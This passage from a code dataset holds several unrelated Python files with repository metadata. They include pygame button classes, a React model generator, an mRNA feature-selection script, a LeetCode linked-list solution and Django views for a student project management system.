self.hovered = self.text_hovered\n\n self.image = self.original\n self.click_callback = click_callback\n\n def update(self, scene, events):\n is_colliding = self.rect.collidepoint(pygame.mouse.get_pos())\n already_hovering = scene.hovering_button\n\n if is_colliding and not already_hovering:\n self.image = self.hovered\n scene.hovering_button = True\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN and is_colliding:\n if self.click_callback is not None:\n pygame.mixer.music.load(os.path.abspath(\"./resources/sounds/click.mp3\").replace(\"\\\\\", \"/\"))\n pygame.mixer.music.play(start=0.6)\n self.click_callback()\n\n elif is_colliding and already_hovering:\n self.image = self.original\n scene.hovering_button = True\n else:\n self.image = self.original\n scene.hovering_button = False\n\n\nclass SwitchButton(pygame.sprite.Sprite):\n\n def __init__(self, current_button, buttons):\n super().__init__()\n self.buttons = buttons\n self.current_button = current_button\n self.image = self.current_button.image\n self.rect = self.current_button.rect\n\n def set_current_button(self, button):\n self.current_button = button\n\n def update(self, scene, events):\n is_colliding = self.rect.collidepoint(pygame.mouse.get_pos())\n already_hovering = scene.hovering_button\n\n if is_colliding and not already_hovering:\n self.image = self.current_button.hovered\n scene.hovering_button = True\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN and is_colliding:\n if self.current_button.click_callback is not None:\n pygame.mixer.music.load(os.path.abspath(\"./resources/sounds/click.mp3\").replace(\"\\\\\", \"/\"))\n pygame.mixer.music.play(start=0.6)\n self.current_button.click_callback()\n\n elif is_colliding and already_hovering:\n self.image = self.current_button.original\n scene.hovering_button = True\n else:\n self.image = self.current_button.original\n scene.hovering_button = False\n", "repo_name": "CustomEntity/dungeon-game", "sub_path": "scene/scene.py", "file_name": "scene.py", "file_ext": "py", "file_size_in_byte": 5864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Union", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.Surface", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.surface.SurfaceType", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.sprite.Group", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.event.EventType", "line_number": 22, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 42, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 42, "usage_type": "name"}, {"api_name": "PIL.ImageSequence.Iterator", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.ImageSequence", "line_number": 44, "usage_type": "name"}, {"api_name": "pygame.image.fromstring", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 145, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 156, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 169, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 178, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 179, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 179, "usage_type": "attribute"}]}
+{"seq_id": "38592575248", "text": "from typing import List\n\n\nclass ReactModelGenerator:\n\n def __init__(self):\n self.imports = \"\"\n self.content = \"\"\n\n def clean(self):\n self.imports = \"\"\n self.content = \"\"\n\n def build_class(self, list_attr: List):\n self.build_headers()\n self.build_validate_function(list_attr)\n self.build_transform_function(list_attr)\n self.build_empty_function(list_attr)\n\n def build_headers(self):\n self.content += self.imports\n\n def build_validate_function(self, list_attr: List):\n self.content += \"export const validate\" + list_attr[0][\"name\"] + \" = (body) => {\\n\" +\\\n \" //const { } = body;\\n\" +\\\n \"}\\n\\n\"\n\n def build_transform_function(self, list_attr: List):\n self.content += \"export const transformEntity\" + list_attr[0][\"name\"] + \" = (entity) => {\\n\"\n self.content += \" let newEnt = {...entity}\\n\"\n for i in range(len(list_attr)):\n dict_attr = list_attr[i]\n if str(dict_attr[\"column\"]) == \"foreign\":\n self.content += \" newEnt.\" + dict_attr[\"name\"] + \" = newEnt.\" +\\\n dict_attr[\"name\"] + \"?.\" + dict_attr[\"fe_pk\"] + \";\\n\"\n self.content += \" return newEnt;\\n\"\n self.content += \"}\\n\\n\"\n\n def build_empty_function(self, list_attr: List):\n self.content += \"export const buildEmpty\" + list_attr[0][\"name\"] + \" = () => {\\n\"\n self.content += \" return {\\n\"\n for i in range(len(list_attr)):\n dict_attr = list_attr[i]\n if dict_attr[\"type\"] != \"entity\" and not str(dict_attr[\"column\"]).startswith(\"foreign_ref\"):\n self.content += \" \" + dict_attr[\"name\"] + \": '',\\n\"\n self.content += \" };\\n\"\n self.content += \"}\\n\\n\"\n", "repo_name": "VictorAndres20/nest-backend-generator", "sub_path": "src/generator/react_model_generator.py", "file_name": "react_model_generator.py", "file_ext": "py", "file_size_in_byte": 1833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "11495766698", "text": "\"\"\"Keep 100 features with highest variance\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\n\nmRNA_PATH = '/data/PanCancer_mRNA.txt'\n\n# Read data\ndata_mrna = pd.read_csv(mRNA_PATH, sep='\\t')\nmrna_samples = pd.read_csv(mRNA_PATH, sep='\\t', header=None, nrows=1)\nmrna_samples = mrna_samples.values.tolist()\nmrna_samples = mrna_samples[0]\nmrna_samples = mrna_samples[1:]\nfor j in range(len(mrna_samples)):\n\tmrna_samples[j] = mrna_samples[j][:12]\ndata_mrna.columns = ['sample'] + mrna_samples\ndata_mrna.fillna(0.0, inplace=True)\ndata_mrna = data_mrna.T\ndata_mrna.drop(index='sample', inplace=True)\n\n\n# Read patients ID in preprocessed clinical data\ndata_clin = pd.read_csv('/preprocessed_data/Pc_clinical_emb.csv', header=None)\nclin_samples = data_clin[[0]]\nclin_samples = clin_samples.values.tolist()\nclinical_samples = list()\nfor i in range(len(clin_samples)):\n\tclinical_samples.append(clin_samples[i][0])\nclin_samples = clinical_samples\n\n\n# Remove the rows with same patient ID\ndata_mrna.reset_index(inplace=True)\ndata_mrna = data_mrna.drop_duplicates(['index'])\ndata_mrna.reset_index(drop=True)\ndata_mrna.set_index('index', inplace=True)\n\n\n# Select the top 100 features with highest variance\nvar_arr = np.array(data_mrna.var())\nvar_list_idx = np.argsort(-var_arr)\ntop100idx = var_list_idx[:100]\ndata_mrna_100 = data_mrna.loc[:, top100idx]\n\n\n# min-max normalization\nscaler = MinMaxScaler()\nmrna_0_1 = scaler.fit_transform(data_mrna_100)\nmrna_f_df = pd.DataFrame(mrna_0_1)\nmrna_f_df.index = data_mrna.index\nmrna_f_df.reset_index(inplace=True)\n\n\n# Create all zero vector\na = mrna_f_df[mrna_f_df['index'] == 'TCGA-OR-A5J1']\nsample_row = a.copy()\nsample_row['index'] = 'xx'\nfor i in range(mrna_f_df.shape[1]-1):\n\tsample_row[i] = 0.0\n\n\n# Fill NaN with zero vectors\ni = 0\nfor x in clin_samples:\n\tif i == 0:\n\t\tmrna = mrna_f_df[mrna_f_df['index'] == x]\n\t\tif mrna.shape[0] == 0:\n\t\t\tmrna = sample_row.copy()\n\t\t\tmrna['index'] = x\n\t\ti += 1\n\telse:\n\t\tmrna_row = mrna_f_df[mrna_f_df['index'] == x]\n\t\tif mrna_row.shape[0] == 0:\n\t\t\tmrna_row = sample_row.copy()\n\t\t\tmrna_row['index'] = x\n\t\tmrna = pd.concat([mrna, mrna_row], axis = 0)\n\n\n# Save data\nmrna.set_index('index', inplace=True)\nmrna.to_csv(f'/preprocessed_data/PC_mRNA_100.csv', index=False, header=False)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "ZhangqiJiang07/MultimodalSurvivalPrediction", "sub_path": "preprocess/mrna_rsf_cph.py", "file_name": "mrna_rsf_cph.py", "file_ext": "py", "file_size_in_byte": 2303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "6888800239", "text": "import json\nfrom db import SessionLocal\nfrom models import BoardCell\n\n\ndef main():\n\n db = SessionLocal()\n\n with open(\"cells.json\") as f:\n data = json.load(f)\n direction_map = {\n \"top\": \"N\",\n \"left\": \"W\",\n \"right\": \"E\",\n \"bottom\": \"S\"\n }\n for direction in direction_map.keys():\n for cell in data[direction]:\n db.add(BoardCell(\n direction=direction_map[direction],\n cell_type=cell.get(\"type\"),\n color=cell.get(\"color\",\"\"),\n cell_id=cell.get(\"id\"),\n icon=cell.get(\"icon\", \"\"),\n label=cell.get(\"label\", \"\")\n ))\n\n db.commit()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "nakamura9/fw-monopoly", "sub_path": "ingest.py", "file_name": "ingest.py", "file_ext": "py", "file_size_in_byte": 801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "db.SessionLocal", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "db.add", "line_number": 20, "usage_type": "call"}, {"api_name": "models.BoardCell", "line_number": 20, "usage_type": "call"}, {"api_name": "db.commit", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "3585213766", "text": "from django.core.management.base import BaseCommand\nfrom exp.models import ExpPlatform, PrepMethod\n\n\nPLATFORMS = [\n {\n 'method': '',\n 'kit': '',\n }\n]\n\n\nclass Command(BaseCommand):\n help = 'Creates a list of ExpPlatform objects from a given list'\n\n def handle(self, **options):\n for platform_dict in PLATFORMS:\n platform_obj, created = ExpPlatform.objects.get_or_create(\n method=platform_dict['method'],\n kit = platform_dict['kit']\n )\n if created:\n print(f'Project {platform_obj} created!')\n platform_obj.save()", "repo_name": "wjojf/ngsdb", "sub_path": "exp/management/commands/createprepmethods.py", "file_name": "createprepmethods.py", "file_ext": "py", "file_size_in_byte": 632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 13, "usage_type": "name"}, {"api_name": "exp.models.ExpPlatform.objects.get_or_create", "line_number": 18, "usage_type": "call"}, {"api_name": "exp.models.ExpPlatform.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "exp.models.ExpPlatform", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "39096457897", "text": "from typing import Optional\n\nfrom Python.auxiliary.ListNode import ListNode\n\n\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n #\n # Solution v1.1: Brute Force\n #\n # Runtime: 40 ms @ (beats) 82.40%\n # Memory Usage: 14.1 MB @ (beats) 83.20%\n #\n # if not head or not head.next:\n # return head\n #\n # ans = ListNode()\n # ans.next = temp = ListNode(head.val)\n # while head:\n # if head.val > temp.val:\n # temp.next = ListNode(head.val)\n # temp = temp.next\n # head = head.next\n #\n # return ans.next\n\n #\n # Solution v1.2: Optimize\n #\n # Runtime: 36 ms @ (beats) 94.65%\n # Memory Usage: 14.3 MB @ (beats) 25.29%\n #\n if not head or not head.next:\n return head\n\n ans = ListNode()\n ans.next = temp = head\n while head:\n if head.val == temp.val:\n temp.next = head.next\n head = head.next\n\n return ans.next", "repo_name": "yogggithub/algorithm", "sub_path": "LeetCode/Python/solutions/p0083.py", "file_name": "p0083.py", "file_ext": "py", "file_size_in_byte": 1116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Optional", "line_number": 7, "usage_type": "name"}, {"api_name": "Python.auxiliary.ListNode.ListNode", "line_number": 7, "usage_type": "name"}, {"api_name": "Python.auxiliary.ListNode.ListNode", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "25876237867", "text": "import random\r\nfrom django.shortcuts import render\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom django.urls import reverse\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom PMS.forms import *\r\nfrom PMS.models import *\r\nfrom datetime import datetime\r\n\r\n# utility functions\r\ndef get_user_profile(user):\r\n if user.role == \"STUDENT\":\r\n return StudentProfile.objects.get(user=user)\r\n elif user.role == \"SUPERVISOR\":\r\n return SupervisorProfile.objects.get(user=user)\r\n \r\ndef get_project_title(project_id):\r\n return Project.objects.get(id=project_id)\r\n\r\ndef remove_duplicates_from_list(list):\r\n list_without_duplicates = []\r\n for element in list:\r\n if element not in list_without_duplicates:\r\n list_without_duplicates.append(element)\r\n return list_without_duplicates\r\n\r\n# Create your views here.\r\ndef index(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse(\"home\"))\r\n else:\r\n return HttpResponseRedirect(reverse(\"login\"))\r\n \r\ndef login_view(request):\r\n if request.user.is_authenticated:\r\n return HttpResponseRedirect(reverse(\"home\"))\r\n if request.method == 'POST':\r\n username = request.POST['username']\r\n password = request.POST['password']\r\n user = authenticate(request, username=username, password=password)\r\n if user:\r\n login(request, user)\r\n # generate task overdue notifications for supervisors\r\n if request.user.role == \"SUPERVISOR\":\r\n supervisor_profile = SupervisorProfile.objects.get(user=user)\r\n student_profiles = StudentProfile.objects.filter(supervisor=supervisor_profile)\r\n projects = [student_profile.project for student_profile in student_profiles]\r\n for project in projects:\r\n tasks = Task.objects.filter(project=project)\r\n existing_overdue_notifications = Notification.objects.filter(type=\"TASK_OVERDUE\", overdue_task__project=project)\r\n tasks_in_existing_overdue_notifications = [notification.overdue_task for notification in existing_overdue_notifications]\r\n for task in tasks:\r\n if task.is_overdue() and task not in tasks_in_existing_overdue_notifications:\r\n new_overdue_notification = Notification(user=request.user, type=\"TASK_OVERDUE\", timestamp=task.due_date, overdue_task=task)\r\n new_overdue_notification.save()\r\n\r\n return HttpResponseRedirect(reverse('home'))\r\n else:\r\n return render(request, 'PMS/login.html', {\r\n \"failed_auth\": True\r\n })\r\n else:\r\n logged_out = request.GET.get('logout', False)\r\n return render(request, \"PMS/login.html\", {\r\n \"logged_out\": logged_out\r\n })\r\n\r\ndef logout_handler(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse(\"login\") + \"?logout=true\")\r\n\r\ndef home(request):\r\n def generate_random_icon():\r\n icons = [\"fa-code\", \"fa-share-alt\", \"fa-pie-chart\", \"fa-laptop\", \"fa-tasks\"]\r\n selected_icon = random.choice(icons)\r\n return selected_icon\r\n \r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n \r\n user_profile = get_user_profile(request.user)\r\n if request.user.role == \"SUPERVISOR\":\r\n projects = [student.project for student in StudentProfile.objects.filter(supervisor=user_profile)]\r\n else:\r\n projects = \"\"\r\n\r\n if request.user.role == \"STUDENT\":\r\n tasks = Task.objects.filter(project=user_profile.project).order_by(\"due_date\")\r\n first_four_unfinished_tasks = [task for task in tasks if not task.completed][:4]\r\n else:\r\n first_four_unfinished_tasks = \"\"\r\n\r\n notifications = Notification.objects.filter(user=request.user).order_by(\"-timestamp\")[:4]\r\n\r\n return render(request, \"PMS/home.html\", {\r\n \"user_profile\": user_profile,\r\n \"projects\": projects,\r\n \"first_four_unfinished_tasks\": first_four_unfinished_tasks,\r\n \"generate_random_icon\": generate_random_icon,\r\n \"notifications\": notifications\r\n })\r\n\r\ndef projects(request):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n if not request.user.role == \"SUPERVISOR\":\r\n return HttpResponse(\"403 Unauthorized\", status=403)\r\n user_profile = get_user_profile(request.user)\r\n students = StudentProfile.objects.filter(supervisor=user_profile)\r\n return render(request, \"PMS/projects.html\", {\r\n \"user_profile\": user_profile,\r\n \"students\": students\r\n })\r\n\r\ndef notifications(request):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n notification_list = Notification.objects.filter(user=request.user).order_by(\"-timestamp\")\r\n return render(request, \"PMS/notifications.html\", {\r\n \"user_profile\": user_profile,\r\n \"notification_list\": notification_list,\r\n })\r\n\r\ndef project(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n return HttpResponseRedirect(reverse(\"tasks\", kwargs={\"project_id\": project_id}))\r\n\r\ndef tasks(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n task_list = Task.objects.filter(project__id=project_id).order_by('due_date')\r\n subtask_list = Subtask.objects.filter(task__project__id=project_id)\r\n resource_list = Resource.objects.filter(project__id=project_id)\r\n message_list = TaskMessage.objects.filter(task__project__id=project_id)\r\n categories_with_duplicates = [task.category for task in task_list]\r\n categories = remove_duplicates_from_list(categories_with_duplicates)\r\n return render(request, \"PMS/tasks.html\", {\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"new_task_form\": NewTaskForm(),\r\n \"task_list\": task_list,\r\n \"subtask_list\": subtask_list,\r\n \"resource_list\": resource_list,\r\n \"message_list\": message_list,\r\n \"categories\": categories\r\n })\r\n\r\ndef add_task(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n project_id = request.POST.get(\"project_id\", \"\")\r\n title = request.POST.get(\"title\", \"\")\r\n category = request.POST.get(\"category\", \"\")\r\n start_date = request.POST.get(\"start_date\", \"\")\r\n due_date = request.POST.get(\"due_date\", \"\")\r\n description = request.POST.get(\"description\", \"\")\r\n dependency = request.POST.get(\"dependency\", \"\")\r\n # if all required values are truthy\r\n if (project_id and title and category and start_date and due_date and description):\r\n project = Project.objects.get(id=project_id)\r\n if dependency:\r\n dependency_task = Task.objects.get(id=dependency)\r\n else:\r\n dependency_task = None\r\n task = Task(project=project, title=title, category=category, start_date=start_date, due_date=due_date, description=description, dependency=dependency_task, completed=False)\r\n task.save()\r\n # creating a notification for the other party\r\n student_profile = StudentProfile.objects.get(project=project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"NEW_TASK\", new_task=task)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_TASK\", new_task=task)\r\n notification.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef add_subtask(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n subtask_title = request.POST.get(\"subtask_title\", \"\")\r\n due_date = request.POST.get(\"due_date\", \"\")\r\n # if all values are truthy\r\n if (task_id and subtask_title and due_date):\r\n task = Task.objects.get(id=task_id)\r\n subtask = Subtask(task=task, title=subtask_title, due_date=due_date, completed=False)\r\n subtask.save()\r\n return HttpResponse(subtask.id)\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef toggle_task_completion(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n # if all values are truthy\r\n if (task_id):\r\n task = Task.objects.get(id=task_id)\r\n task.completed = not task.completed\r\n task.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef toggle_subtask_completion(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n subtask_id = request.POST.get(\"subtask_id\", \"\")\r\n # if value is truthy\r\n if (subtask_id):\r\n subtask = Subtask.objects.get(id=subtask_id)\r\n subtask.completed = not subtask.completed\r\n subtask.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n \r\ndef send_task_message(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n task_id = request.POST.get(\"task_id\", \"\")\r\n task = Task.objects.get(id=task_id)\r\n message = request.POST.get(\"message\", \"\")\r\n user = request.user\r\n timestamp = datetime.now()\r\n # if value is truthy\r\n if (task and message and user and timestamp):\r\n task_message = TaskMessage(task=task, user=user, text=message, timestamp=timestamp)\r\n task_message.save()\r\n student_profile = StudentProfile.objects.get(project=task.project)\r\n if request.user.role == \"SUPERVISOR\":\r\n student = student_profile.user\r\n notification = Notification(user=student, type=\"CHAT_TASK\", chat_task=task)\r\n notification.save()\r\n elif request.user.role == \"STUDENT\":\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"CHAT_TASK\", chat_task=task)\r\n notification.save()\r\n return HttpResponse(\"Success\")\r\n else:\r\n return HttpResponse(\"Bad request\", status=400)\r\n\r\ndef gantt(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n task_list = Task.objects.filter(project__id=project_id)\r\n return render(request, \"PMS/gantt.html\", {\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"task_list\": task_list\r\n })\r\n\r\ndef meeting_records(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n submitted = request.GET.get('submitted', '')\r\n status_updated = request.GET.get('statusUpdate', '')\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n meeting_record_list = MeetingRecord.objects.filter(project__id=project_id).order_by('date')\r\n return render(request, \"PMS/meeting_records.html\", {\r\n \"submitted\": submitted,\r\n \"status_updated\": status_updated,\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"meeting_records\": meeting_record_list\r\n })\r\n\r\ndef add_meeting_record(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n if not request.user.role == \"STUDENT\":\r\n return HttpResponse(\"403 Unauthorized\", status=403)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n \r\n if request.method == \"POST\":\r\n form = NewMeetingRecordForm(request.POST)\r\n new_meeting_record= form.save(commit=False)\r\n supervisor = user_profile.supervisor\r\n new_meeting_record.student = f\"{user_profile.first_name} {user_profile.last_name}\"\r\n new_meeting_record.supervisor = f\"{supervisor.first_name} {supervisor.last_name}\"\r\n new_meeting_record.project = user_profile.project\r\n new_meeting_record.save()\r\n # generate notification for supervisor\r\n student_profile = user_profile\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_MEETING_RECORD\", new_meeting_record=new_meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?submitted=True\")\r\n\r\n return render(request, \"PMS/add_view_meeting_record.html\", {\r\n \"form\": NewMeetingRecordForm(),\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title\r\n })\r\n\r\ndef view_edit_meeting_records(request, project_id, meeting_record_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n meeting_record = MeetingRecord.objects.get(id=meeting_record_id)\r\n meeting_record_form = NewMeetingRecordForm(instance=meeting_record)\r\n\r\n if request.method == \"GET\":\r\n return render(request, \"PMS/add_view_meeting_record.html\", {\r\n \"form\": meeting_record_form,\r\n \"meeting_record\": meeting_record,\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title\r\n })\r\n elif request.method == \"POST\":\r\n form = NewMeetingRecordForm(request.POST)\r\n new_meeting_record= form.save(commit=False)\r\n supervisor = user_profile.supervisor\r\n new_meeting_record.student = f\"{user_profile.first_name} {user_profile.last_name}\"\r\n new_meeting_record.supervisor = f\"{supervisor.first_name} {supervisor.last_name}\"\r\n new_meeting_record.project = user_profile.project\r\n new_meeting_record.save()\r\n meeting_record.delete()\r\n # generate notification for supervisor\r\n student_profile = user_profile\r\n supervisor = student_profile.supervisor.user\r\n notification = Notification(user=supervisor, type=\"NEW_MEETING_RECORD\", new_meeting_record=new_meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?statusUpdate=True\")\r\n\r\ndef approve_meeting_record(request, project_id):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 not found\", status=404)\r\n if request.user.role != \"SUPERVISOR\":\r\n # TODO: add logic to check if project is under supervisor\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n \r\n meeting_record_id = request.POST.get(\"id\", \"\")\r\n meeting_record = MeetingRecord.objects.get(id=meeting_record_id)\r\n meeting_record.approved = True\r\n meeting_record.save()\r\n # generate notification for students\r\n student = StudentProfile.objects.get(project=meeting_record.project).user\r\n notification = Notification(user=student, type=\"UPDATED_MEETING_RECORD\", updated_meeting_record=meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?statusUpdate=True\")\r\n\r\ndef reject_meeting_record(request, project_id):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 not found\", status=404)\r\n if request.user.role != \"SUPERVISOR\":\r\n # TODO: add logic to check if project is under supervisor\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n \r\n meeting_record_id = request.POST.get(\"id\", \"\")\r\n reject_reason = request.POST.get(\"reject_reason\", \"\")\r\n meeting_record = MeetingRecord.objects.get(id=meeting_record_id)\r\n meeting_record.approved = False\r\n meeting_record.reject_reason = reject_reason\r\n meeting_record.save()\r\n # generate notification for students\r\n student = StudentProfile.objects.get(project=meeting_record.project).user\r\n notification = Notification(user=student, type=\"UPDATED_MEETING_RECORD\", updated_meeting_record=meeting_record)\r\n notification.save()\r\n return HttpResponseRedirect(reverse(meeting_records, kwargs={\"project_id\": project_id}) + \"?statusUpdate=True\")\r\n\r\ndef resources(request, project_id):\r\n if not request.user.is_authenticated:\r\n return HttpResponse(\"401 Forbidden\", status=401)\r\n user_profile = get_user_profile(request.user)\r\n project_title = get_project_title(project_id)\r\n resource_list = Resource.objects.filter(project__id=project_id)\r\n message_list = ResourceMessage.objects.filter(resource__project__id=project_id)\r\n categories_with_duplicates = [resource.category for resource in resource_list]\r\n categories = remove_duplicates_from_list(categories_with_duplicates)\r\n task_list = Task.objects.filter(project__id=project_id)\r\n return render(request, \"PMS/resources.html\", {\r\n \"user_profile\": user_profile,\r\n \"project_id\": project_id,\r\n \"project_title\": project_title,\r\n \"resource_list\": resource_list,\r\n \"message_list\": message_list,\r\n \"categories\": categories,\r\n \"task_list\": task_list,\r\n \"new_resource_form\": NewResourceForm(),\r\n })\r\n\r\ndef add_resource(request):\r\n if request.method == \"GET\":\r\n return HttpResponse(\"404 Not Found\", status=404)\r\n else:\r\n project_id = request.POST.get(\"project_id\", \"\")\r\n title = request.POST.get(\"title\", \"\")\r\n category = request.POST.get(\"category\", \"\")\r\n description = request.POST.get(\"description\", 